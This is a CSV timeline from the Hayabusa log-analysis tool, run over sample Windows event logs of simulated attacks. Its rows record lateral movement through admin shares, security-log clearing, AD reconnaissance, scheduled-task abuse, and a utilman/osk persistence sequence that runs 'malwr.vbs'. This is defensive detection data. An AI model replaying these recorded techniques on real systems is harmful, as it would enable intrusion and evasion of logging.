2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
